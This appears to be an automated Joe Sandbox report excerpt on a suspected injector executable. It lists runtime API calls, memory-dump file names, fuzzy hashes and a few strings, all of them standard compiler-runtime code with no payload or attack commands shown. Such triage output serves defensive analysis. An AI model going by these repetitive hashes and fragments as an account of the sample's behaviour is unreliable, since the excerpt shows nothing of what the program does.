                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00607ECC
                                                                          • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00607ED9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                          • String ID:
                                                                          • API String ID: 3906539128-0
                                                                          • Opcode ID: 450d8dda16d6efa1ad592ea350e8da3c94778e39d5780686f5bd2230786d3ce6
                                                                          • Instruction ID: 090189cb60842e2ebe73e14804d61cee46200a39c152a7c9024b7f2ecf17469c
                                                                          • Opcode Fuzzy Hash: 450d8dda16d6efa1ad592ea350e8da3c94778e39d5780686f5bd2230786d3ce6
                                                                          • Instruction Fuzzy Hash: 3D31B3749412189BCB65DF64D889BCEBBB9BF08310F5081EAE41CA7290EB709F858F54
                                                                          APIs
                                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 00602437
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: ___std_exception_destroy
                                                                          • String ID:
                                                                          • API String ID: 4194217158-0
                                                                          • Opcode ID: a340621dc4c0725d217f361c79873cb79f5230ebcb405efa72ec5fc9ff3ca584
                                                                          • Instruction ID: 841f7702da80e4ed265f4249a1f8bedbd3034f6d56b361f367ec860eb198457f
                                                                          • Opcode Fuzzy Hash: a340621dc4c0725d217f361c79873cb79f5230ebcb405efa72ec5fc9ff3ca584
                                                                          • Instruction Fuzzy Hash: 25A26B66A955844FEF014AB884B93DF6FE64B6B330F6A2755C6F06F2D3D50B000B9B60
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: -g}5
                                                                          • API String ID: 0-4071012034
                                                                          • Opcode ID: e8575c76f31cbd564eb84687938ece634aea3e3b98c9368093306eb74a3c2c3f
                                                                          • Instruction ID: b32905de734b9babcee309881dbf67720d6c24250e88d5d1f6dd2d1c1e578b85
                                                                          • Opcode Fuzzy Hash: e8575c76f31cbd564eb84687938ece634aea3e3b98c9368093306eb74a3c2c3f
                                                                          • Instruction Fuzzy Hash: 8692AAA6A556C45FEF024AB8D4A93DF6FF24B6B331F6E2B5586E01F2D3C507004A9B10
                                                                          APIs
                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00611F2D,?,?,00000008,?,?,00611AFF,00000000), ref: 006121FF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionRaise
                                                                          • String ID:
                                                                          • API String ID: 3997070919-0
                                                                          • Opcode ID: efabee2936d2f0fabfddb59335c85a2737da9df6c4620cd88fdd2aa0f0e2342c
                                                                          • Instruction ID: 4328afd350f9cf690555a6811dad18d833e07b25eab97825cdaca1dd3262d17b
                                                                          • Opcode Fuzzy Hash: efabee2936d2f0fabfddb59335c85a2737da9df6c4620cd88fdd2aa0f0e2342c
                                                                          • Instruction Fuzzy Hash: 87B17F3111060A9FD715CF28C496BE57BE2FF05364F298658E999CF3A1C335DAA2CB40
                                                                          APIs
                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00605216
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: FeaturePresentProcessor
                                                                          • String ID:
                                                                          • API String ID: 2325560087-0
                                                                          • Opcode ID: be77e1d7f50bcc72abeb7819c7fc3ae9350c544f4054829b38ca03c99b2b1a4f
                                                                          • Instruction ID: d0b22c971addbd7a8aaa3fc9551b47b929e31e132074f7e693666c17d20d2d09
                                                                          • Opcode Fuzzy Hash: be77e1d7f50bcc72abeb7819c7fc3ae9350c544f4054829b38ca03c99b2b1a4f
                                                                          • Instruction Fuzzy Hash: DE512D71A416598FDB18CF55D8856DFBBF2FB58350F18992AD412E7390E3B49900CF90
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: k#fz
                                                                          • API String ID: 0-1948189604
                                                                          • Opcode ID: 7d2b92a68e1b8b1830cd4a016840bf8b901fbf9f1078d7b811290cbc9af5bada
                                                                          • Instruction ID: 27e12533ada161fc6978f30737a1a986bb08370a543dc64709424418738aca45
                                                                          • Opcode Fuzzy Hash: 7d2b92a68e1b8b1830cd4a016840bf8b901fbf9f1078d7b811290cbc9af5bada
                                                                          • Instruction Fuzzy Hash: 50D13172E115188FDB10CEBDC94069DBBF2BF48720F2A8729E965FB6D4D63499418B80
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00015560), ref: 0060543D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: d9de9928e9a8eace8d0e2bdb5b0bbd3cc5c9b638a558dbc0476400e807edfb2b
                                                                          • Instruction ID: cc5abb615f928e0ad54d059a4268a45ee0c41719a00ca07ffb6717aefcad3e15
                                                                          • Opcode Fuzzy Hash: d9de9928e9a8eace8d0e2bdb5b0bbd3cc5c9b638a558dbc0476400e807edfb2b
                                                                          • Instruction Fuzzy Hash:
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: HeapProcess
                                                                          • String ID:
                                                                          • API String ID: 54951025-0
                                                                          • Opcode ID: 0df59532cd8e661acc071a89443c5ff0b7d0bae8c2e0f6e64f4fb6db4510bdc9
                                                                          • Instruction ID: 63f7c8ef6482c013fb237a05e567c6be8eed23c1d217956605c4e9db1af88327
                                                                          • Opcode Fuzzy Hash: 0df59532cd8e661acc071a89443c5ff0b7d0bae8c2e0f6e64f4fb6db4510bdc9
                                                                          • Instruction Fuzzy Hash: 65A00270D411018BD7404F75AA1529D3AD66945691709D1665405C5160D63454559B15
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e19156ba2ecaf578c44f8189a42d8724fb445076064de5ec7fc1a402f569acee
                                                                          • Instruction ID: d711651e1a456a17654df92074ef7388428e0dfe87419381d0bde8a7bb672ae2
                                                                          • Opcode Fuzzy Hash: e19156ba2ecaf578c44f8189a42d8724fb445076064de5ec7fc1a402f569acee
                                                                          • Instruction Fuzzy Hash: 7632D376E442844FEB018ABCC4A53DF6FF25B6B334F296719C6A46F3D6D91B040A8B50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1d1653d5d05d827914a193c2d2b203066352463bd77e5dfba5a7b054795746de
                                                                          • Instruction ID: ad3871a583fd240b1fcaa86f46e4443d85d95872e5d459be03167ed7c7614484
                                                                          • Opcode Fuzzy Hash: 1d1653d5d05d827914a193c2d2b203066352463bd77e5dfba5a7b054795746de
                                                                          • Instruction Fuzzy Hash: 9302C377A916504FEF01497CC8B83DB1BE747A7735E2A2726CAB05B3E2C55B010E9B50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0497c1ece72bce7cea91399d83e5cd3da8bec8792b641691853af2fd5ebe61d3
                                                                          • Instruction ID: 77b613582fb08ae67a9eddfa0b2a8e5dcdd4477b7eabea30b283d5559e15e01b
                                                                          • Opcode Fuzzy Hash: 0497c1ece72bce7cea91399d83e5cd3da8bec8792b641691853af2fd5ebe61d3
                                                                          • Instruction Fuzzy Hash: 0FE13C72A505544FDF008A7CC4A83EF2FE25B6B334F2A2726DAB06F7D2D65B04099B50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 946aa40d6aff84aa899a2952442f80450f44698323960e47ae53c9ff2b8503fd
                                                                          • Instruction ID: 0dd12cdb0e45ec318066a525c8433f750a03acff8b777095c5d9c81da76aa7d0
                                                                          • Opcode Fuzzy Hash: 946aa40d6aff84aa899a2952442f80450f44698323960e47ae53c9ff2b8503fd
                                                                          • Instruction Fuzzy Hash: 23D0923A645A58AFC310CF49E840D41F7B9FB8D670B158066EA0893B20C331FC11CBE0
                                                                          APIs
                                                                          • type_info::operator==.LIBVCRUNTIME ref: 006091F2
                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 00609300
                                                                          • CatchIt.LIBVCRUNTIME ref: 00609351
                                                                          • _UnwindNestedFrames.LIBCMT ref: 00609452
                                                                          • CallUnexpected.LIBVCRUNTIME ref: 0060946D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                          • String ID: 81a$@]`$csm$csm$csm
                                                                          • API String ID: 4119006552-2904502630
                                                                          • Opcode ID: fe1439339c7b6a5e8adca62cbe2ea3462f8d3d8c2e65a2e381a29e32d83fc6bb
                                                                          • Instruction ID: 3016f033c445908f10900d40dad0f93e59d8fb4ed785d9069d62958cf1288aad
                                                                          • Opcode Fuzzy Hash: fe1439339c7b6a5e8adca62cbe2ea3462f8d3d8c2e65a2e381a29e32d83fc6bb
                                                                          • Instruction Fuzzy Hash: 87B14871880209EFCF2DDFA4C8819AFB7B7BF14310B14415AE8516B292D731DA52CFA5
                                                                          APIs
                                                                          • _ValidateLocalCookies.LIBCMT ref: 00606167
                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0060616F
                                                                          • _ValidateLocalCookies.LIBCMT ref: 006061F8
                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00606223
                                                                          • _ValidateLocalCookies.LIBCMT ref: 00606278
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                          • String ID: ^`$csm
                                                                          • API String ID: 1170836740-1882418840
                                                                          • Opcode ID: c26ba33b4f30b571918c3f623e990367162d33124526fab73bea00f59fe64a62
                                                                          • Instruction ID: 90456e970c5f5d5309060872ef2bf3443fd3f0d848e6d25cd926d0bfeb833730
                                                                          • Opcode Fuzzy Hash: c26ba33b4f30b571918c3f623e990367162d33124526fab73bea00f59fe64a62
                                                                          • Instruction Fuzzy Hash: A041B334A40219ABCF18DF68C844ADFBBA7AF45314F188599F8155B3D3D731AA25CB90
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                          • String ID:
                                                                          • API String ID: 127012223-0
                                                                          • Opcode ID: e265d3f8e77baf8072f43c326dbad3aa81b6f9c6be00d00b3766d3fc8c1601d2
                                                                          • Instruction ID: 6b10638dc25e9bc4a3cd96c350900d51597d1284e28d6bd1f5a1a3fdc9f4682a
                                                                          • Opcode Fuzzy Hash: e265d3f8e77baf8072f43c326dbad3aa81b6f9c6be00d00b3766d3fc8c1601d2
                                                                          • Instruction Fuzzy Hash: B171D472900206ABFF219B648981BEF7BAB9F49310F1C4459F915A7381E7B5DDC08B64
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,00608831,00605F0D,006055A4), ref: 00608848
                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00608856
                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0060886F
                                                                          • SetLastError.KERNEL32(00000000,00608831,00605F0D,006055A4), ref: 006088C1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastValue___vcrt_
                                                                          • String ID:
                                                                          • API String ID: 3852720340-0
                                                                          • Opcode ID: 4822ae0fc5f684a21b546cf2797e5f2a127b5c2e39853ff0dc0659204779a8b1
                                                                          • Instruction ID: 26b623a5a697a5a8925c9481550a18c81e7c7e487b339b206f7a6a477cc0ac4d
                                                                          • Opcode Fuzzy Hash: 4822ae0fc5f684a21b546cf2797e5f2a127b5c2e39853ff0dc0659204779a8b1
                                                                          • Instruction Fuzzy Hash: 12014C322882115DEB6C9BB57C869DF3787EB627B0364933FF010421E1EF118C015284
                                                                          Strings
                                                                          • C:\Users\user\Desktop\injector V2.5.exe, xrefs: 0060CB70
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: C:\Users\user\Desktop\injector V2.5.exe
                                                                          • API String ID: 0-3924246060
                                                                          • Opcode ID: 21d0de103319c52a7ef06b882a7ca54d4c475b06f8088c9f42b415bc2877c136
                                                                          • Instruction ID: 645d292248e9491ef5cb64f1b936c23e8c4f04460c3bb21068463e209988d407
                                                                          • Opcode Fuzzy Hash: 21d0de103319c52a7ef06b882a7ca54d4c475b06f8088c9f42b415bc2877c136
                                                                          • Instruction Fuzzy Hash: 5D21C671280205AFDB28AF69DC91DAB77ABEF453B47108729F919972D1D730EC409BA0
                                                                          APIs
                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F8F81887,?,?,00000000,006125EB,000000FF,?,00607015,00000002,?,006070B1,006083A0), ref: 00606F89
                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00606F9B
                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,006125EB,000000FF,?,00607015,00000002,?,006070B1,006083A0), ref: 00606FBD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
